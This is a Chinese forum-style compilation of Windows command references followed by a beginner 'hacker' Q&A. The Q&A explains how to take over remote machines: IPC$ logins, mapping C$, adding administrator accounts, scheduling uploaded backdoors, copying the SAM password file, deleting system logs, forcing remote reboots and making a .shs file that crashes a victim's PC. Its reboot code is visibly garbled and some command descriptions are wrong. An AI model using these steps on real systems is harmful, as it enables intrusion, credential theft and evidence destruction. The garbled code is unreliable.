delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete partner /?
delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入 delete records /?
delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /?
delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细信息,请输入 delete pngserver /?
init backup 备份 WINS 数据库。详细信息,请输入 init backup /?
init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /?
init pull 启动“拉”触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init pull /?
init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请输入 init pullrange /?
init push 启动“推”触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init push /?
init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /?
init restore 从文件还原数据库。详细信息,请输入 init restore /?
init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /?
init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /?
reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /?
set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入 set autopartnerconfig /?
set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /?
set burstparam 设置服务器的突发处理参数。详细信息,请输入 set autopartnerconfig /?
set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /?
set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /?
set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /?
set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set periodicdbchecking /?
set pullpartnerconfig 设置指定的“拉”伙伴的配置参数。详细信息,请输入 set pullpartnerconfig /?
set pushpartnerconfig 设置指定的“推”伙伴的配置参数。详细信息,请输入 set pushpartnerconfig /?
set pullparam 设置服务器的默认“拉”参数。详细信息,请输入 set pullparam /?
set pushparam 设置服务器的默认“推”参数。详细信息,请输入 set pushparam /?
set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag /?
set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion /?
show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show browser /?
show database 显示指定服务器的数据库和记录。详细信息,请输入 show database /?
show info 显示配置信息。详细信息,请输入 show info /?
show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /?
show partner 显示服务器的“拉”或“推”(或“推拉”)伙伴。详细信息,请输入 show partner /?
show partnerproperties 显示默认伙伴配置。详细信息,请输入 show partnerproperties /?
show pullpartnerconfig 显示“拉”伙伴的配置信息。详细信息,请输入 show pullpartnerconfig /?
show pushpartnerconfig 显示“推”伙伴的配置信息。详细信息,请输入 show pushpartnerconfig /?
show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /?
show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show recbyversion /?
show server 显示当前选定的服务器。详细信息,请输入 show server /?
show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show statistics /?
show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show version /?
show versionmap 显示所有者 ID 到“最大版本数”的映射。详细信息,请输入 show versionmap /?
Interface 命令
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名。
Win2000命令全集
accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导
acsetups.exe > ACS setup DCOM server executable
actmovie.exe > Direct Show setup tool 直接显示安装工具
append.exe > Allows programs to open data in specified directories as if they were in the current directory. 允许程序打开制定目录中的数据
arp.exe > NETWORK Display and modify IP - Hardware addresses 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe > AT is a scheduling utility also included with UNIX 计划运行任务
atmadm.exe > Displays statistics for ATM call manager. ATM调用管理器统计
attrib.exe > Display and modify attributes for files and folders 显示和更改文件和文件夹属性
autochk.exe > Used to check and repair Windows File Systems 检测修复文件系统
autoconv.exe > Automates the file system conversion during reboots 在启动过程中自动转化系统
autofmt.exe > Automates the file format process during reboots 在启动过程中格式化进程
autolfn.exe > Used for formatting long file names 使用长文件名格式
bootok.exe > Boot acceptance application for registry
bootvrfy.exe > Bootvrfy.exe, a program included in Windows 2000 that notifies the system that startup was successful. Bootvrfy.exe can be run on a local or remote computer. 通报启动成功
cacls.exe > Displays or modifies access control lists (ACLs) of files. 显示和编辑ACL
calc.exe > Windows Calculators 计算器
cdplayer.exe > Windows CD Player CD播放器
change.exe > Change { User | Port | Logon } 与终端服务器相关的查询
charmap.exe > Character Map 字符映射表
chglogon.exe > Same as using "Change Logon" 启动或停用会话记录
chgport.exe > Same as using "Change Port" 改变端口(终端服务)
chgusr.exe > Same as using "Change User" 改变用户(终端服务)
chkdsk.exe > Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter 磁盘检测程序
chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盘检测程序
cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务
cipher.exe > Displays or alters the encryption of directories [files] on NTFS partitions. 在NTFS上显示或改变加密的文件或目录
cisvc.exe > Content Index -- It's the content indexing service for I 索引内容
ckcnv.exe > Cookie Convertor 变换Cookie
cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盘清理
cliconfg.exe > SQL Server Client Network Utility SQL客户网络工具
clipbrd.exe > Clipboard viewer for Local will allow you to connect to other clipboards 剪贴簿查看器
clipsrv.exe > Start the clipboard Server 运行Clipboard服务
clspack.exe > CLSPACK used to create a file listing of system packages 建立系统文件列表清单
cluster.exe > Display a cluster in a domain 显示域的集群
_cmd_.exe > Famous command prompt 没什么好说的!
cmdl32.exe > Connection Manager Auto-Download 自动下载连接管理
cmmgr32.exe > Connection Manager 连接管理器
cmmon32.exe > Connection Manager Monitor 连接管理器监视
cmstp.exe > Connection Manager Profile Manager 连接管理器配置文件安装程序
comclust.exe > about cluster server 集群
comp.exe > ComClust Add, Remove, or Join a cluster. 比较两个文件和文件集的内容*
compact.exe > Displays or alters the compression of files on NTFS partitions. 显示或改变NTFS分区上文件的压缩状态
conime.exe > Console IME IME控制台
control.exe > Starts the control panel 控制面板
convert.exe > Convert File System to NTFS 转换文件系统到NTFS
convlog.exe > Converts MS IIS log files 转换IIS日志文件格式到NCSA格式
cprofile.exe > Copy profiles 转换显示模式
cscript.exe > MS Windows Scripts Host Version 5.1 较本宿主版本
csrss.exe > Client Server Runtime Process 客户服务器Runtime进程
csvde.exe > Comma Separated Variable Import/Export Utility 日至格式转换程序
dbgtrace.exe > 和Terminal Server相关
dcomcnfg.exe > Display the current DCOM configuration. DCOM配置属性
dcphelp.exe > ?
dcpromo.exe > Promote a domain controller to ADSI AD安装向导
ddeshare.exe > Display DDE shares on local or remote computer DDE共享
ddmprxy.exe >
debug.exe > Runs Debug, a program testing and editing tool. 就是DEBUG啦!
dfrgfat.exe > Defrag FAT file system FAT分区磁盘碎片整理程序
dfrgntfs.exe > Defrag NTFS file system NTFS分区磁盘碎片整理程序
dfs_cmd_.exe > configures a Dfs tree 配置一个DFS树
dfsinit.exe > Distributed File System Initialization 分布式文件系统初始化
dfssvc.exe > Distributed File System Server
以上你全学会的话,我不敢说你一定成为了高手,但我保证你不再是菜鸟!整理得有点乱,错误难免,请各位指正!
1)如何查看本机所开端口:
用netstat -a —n命令查看!再stat下面有一些英文,我来简单说一下这些英文具体都代表什么
LISTEN:侦听来自远方的TCP端口的连接请求
SYN-SENT:再发送连接请求后等待匹配的连接请求
SYN-RECEIVED:再收到和发送一个连接请求后等待对方对连接请求的确认
ESTABLISHED:代表一个打开的连接
FIN-WAIT-1:等待远程TCP连接中断请求,或先前的连接中断请求的确认
FIN-WAIT-2:从远程TCP等待连接中断请求
CLOSE-WAIT:等待从本地用户发来的连接中断请求
CLOSING:等待远程TCP对连接中断的确认
LAST-ACK:等待原来的发向远程TCP的连接中断请求的确认
TIME-WAIT:等待足够的时间以确保远程TCP接收到连接中断请求的确认
CLOSED:没有任何连接状态
2)如何获得一个IP地址的主机名?
利用ping -a ip 命令查看!再第一行的pinging后面的 『ip』前面的英文就是对方主机名!
同样道理,利用ping machine_name也可以得到对方的ip
获得一个网站的ip地址的方法是:ping www.***.com
比如想知道sohu的ip,就用ping http://www.sohu.com/来查看就可以了
顺便说一句:如果返回:Reply from *.*.*.*: TTL expired in transit的话,呵呵,代表TTL(生命周期)在传输过程中过期
什么意思呢?我来解释一下!
导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间经过的路由器数目。 2)路由器数量太多,经过路由器的数量大于TTL值!
呵呵,其实这两点是一个意思!只不过说法不同而已!
3)如何查看本机的ip地址?
用ipconfig来查看就可以!
也可以再Windows中的开始菜单,运行中输入winipcfg,同样可以看到自己的ip
ipconfig命令后面如果加一个参数 /all的话,可以得到更加详细的资料,比如DNS、网关等……
4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?
用命令 net helpmsg erorr_code来查看就可以了
比如错误代码为:88
则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任务的!
方法:再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)
再这里,computername:呵呵,还用说么?主机名!
OS=Windows_NT :操作系统的类型哦~
path=C:\perl\bin\ :(perl的解释器位置!)
systemDrive=c: 操作系统盘符!
USERNAME=coldcrysky 当前登陆使用机器的用户
……
(6)跟踪路由器的命令是什么?
tracert 格式:tracert ip
中间会列出所有经过的路由器列表!这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:为什么要把路由放在防火墙后面?原因呢,主要有两点:1)保护路由器!因为现在越来越多的攻击和入侵已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,所以要放在防火墙里面;2)为路由器减少负担!如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!)
当然,利用pathping也可以达到同样效果!格式与tracert一样!
7)简单介绍一下cookie!
cookie,又名小甜点。
它的作用:记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中可以看到很多的记事本文档吧?这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!况且现在也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~
那么,如何清除cookie呢?一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~
除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~
然后到操作系统目录所在的分区中!进入Winnt(98为windows)目录(当然了,这些都是默认的目录!如果你安装的时候改名了,就对应的去相应目录)之后找到Temporary Internet Files目录(2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就可以了~,找到这个文件夹后,打开!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,这些是你浏览过的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文件是网站的页面记录,直接删除就可以了!
另外,有没有彻底禁止cookie的方法呢?
呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是?
另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~
不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~
8)安装2000的时候,速度会特别特别特别慢,怎么加快安装速度呢?
在DOS上面安装,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高安装速度:
g:\>cd windows -------假设G为光驱 windows为98的安装目录!
g:\windows>smartdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~
9)Windows2K密码忘记了,如何才能进入系统?
Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\winnt\system32\config目录中!只要删除这个文件就可以了~
另外,在c:\winnt\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!
10)ping不到,tracert不到,但是却能用nbtstat显示对方的一些信息,为什么?
因为tracert和ping命令使用的是ICMP协议!而nbtstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!
11)telnet上去后,如何给对方开共享?
开共享的命令如下:net share c=c:\winnt\system 返回共享成功
之后直接利用\\ip\c来访问对方的system目录了~删除共享用
share c /del 命令就可以了
12)如何判断对方的具体操作系统版本?
首先用ver命令查看对方的版本号!
如果是5.00.2195的话,为2K;5.1.2600为XP
从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!
2K的pro和svr版本区分:
在telnet下,net shart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)
XP的pro和home版的区分:
home edition是无法安装iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~
当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵
13)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是木马!)
除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
14)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~
还有利用DEBUG法:
简单介绍两种:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一种方法:copy法:
copy con cmos.com
输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~
恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)如何自制一个让98蓝屏的炸弹?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!
16)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\support\tools文件夹下!里面有安装程序,点击后,就安装了2K的support tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的木马、后门软件都有类似的功能!这个是windows自带的大木马『后门工具』而已!)
这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~
那对方机器如果没有安装这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了!呵呵~
17)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addresses to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应请求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don`t Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
18)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh>提示符,再输入:int ip 进入到interface ip> 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh>提示符下输入:interface 回车 之后:ip 回车 再之后:show address 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配置:接着上面的命令,我们使用:set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show address来看看(或者用ipconfig)
3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface ip>状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!
这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh>提示符下才能查看帮助啊~)
19)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!
20)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!具体方法如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)
在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)
看我的:net user coldcrysky /time:all --这样就可以了~
22)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~
之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~
23)139端口的又一用法
呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文件
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include "stdio.h"
#include "windows.h"
int main()
{
文件://定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://因为上面的重启不成功,所以需要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
文件://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判断是NT内核还是9X内核,选择用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵
24)利用批处理文件来建立一个记录3389登陆者信息的记录器
由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文件:内容如下:
@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389
之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵
25)网络命令小节
A、NET命令:
IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接~』
net use \\对方IP\ipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令:
查看远程机时间:net time \\对方IP
加入一项新任务:
at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』
C、TELNET命令:
telnet 对方IP 端口 『作用不用我说了吧???』
D、FTP命令:
登陆:ftp 对方网址(IP地址)
上传文件:get 文件在本机完整路径 对方文件存放完整路径
下载文件:put 对方文件完整路径 本机存放文件路径
E、COPY命令:
在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令:
主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!
G、NBTSTAT命令:
nbtstat -A 对方IP (这个A大写)
『在其中显示<037>前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』
H、SHUTDOWN命令:
『用来关闭对方NT服务的命令』格式如下:
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』
I、DIR命令:
还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件属性用,格式:
Attrib -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)
L、DEL命令:
『删除日志的时候用!』
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
M、PING命令:
-t :ping制定IP,知道网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
-n count :发送count指定的ECHO数据包,默认为4个!
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!)
我要说的命令就是:开启服务和停止服务的net start and net stop
这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net start是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话
OK,有了这个前提后,下面就继续介绍:那么,net start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net help start和net help stop,这两个会显示出你所能开启的服务有那些~~
这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net start和net stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的!明白原因了吧?』
27)关于双系统的两个问题:
A、如何在双系统(98、2000)中安全删除2K?
先制作一张Windows 98 的启动软盘,再用它启动你的计算机,运行sys命令恢复Windows 98引导记录后,再运行fdisk/mbr恢复主引导记录,完成后进入Windows 98,把winnt 和system volumn information 目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
B、 Windows 98/XP双系统启动菜单修复
1.修复前,在BIOS中设置从光驱启动。用Windows XP安装盘启动电脑,在加载必要的驱动后,出现Windows XP的安装界面。有三个选项:
(1)要现在开始安装Windows XP,请按“Enter”键。
(2)要用“恢复控制台”修复Windows XP安装,按“R”键。
(3)要退出安装程序,不安装Windows XP,按“F3”键;
2. 按“R”键,进入“Microsoft Windows XP (TM) 故障恢复控制台”界面;故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows XP系统文件,然后显示搜寻结果,并询问“要登录到哪个Windows XP安装(要取消,请按Enter)”,选择1. D:\Windows,回车,系统会再询问“管理员密码”,再键入安装Windows XP时设置的管理员密码,回车,出现D:\Windows〉,这时需要输入修复命令Fixboot,后面的参数为启动扇区要写入的磁盘盘符,这里填入C:,回车。修复完成,键入Exit退出。重启后就会看到久违的双重启动菜单了。并且,这样修复后基本不产生垃圾文件。
因为这两个问题是非常非常普遍的,所以我就收集到这里了~
28)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到更好的防护作用!』
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
说明:是windows9x的设备名称解析漏洞!
